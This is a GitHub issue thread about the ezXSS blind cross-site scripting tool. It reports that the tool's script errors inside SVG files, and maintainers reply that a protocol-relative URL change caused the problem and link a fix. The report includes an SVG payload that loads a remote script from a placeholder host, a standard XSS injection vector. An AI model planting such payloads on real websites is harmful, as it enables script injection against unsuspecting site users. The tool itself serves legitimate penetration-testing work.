ezXSS: ezXSS script doesn't work in SVG files

Hi,

ezXSS script throws the "Uncaught (in promise) Invalid element provided as first argument" JS error in SVG files.

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" baseProfile="full">
  <script type="text/javascript" xlink:href="https://domain/"/>
</svg>


Other blind XSS apps work fine in SVGs.

About this issue

  • State: closed
  • Created a year ago
  • Comments: 15 (9 by maintainers)

Most upvoted comments

Because I’ve changed https:// to // to also work on http-only installations. I didn’t think about the file: protocol and such, though.

Fixed in https://github.com/ssl/ezXSS/commit/8e103f6f979c474f66a0950634bfca2e89472fae

Awesome. Thanks for helping out improving ezXSS 😃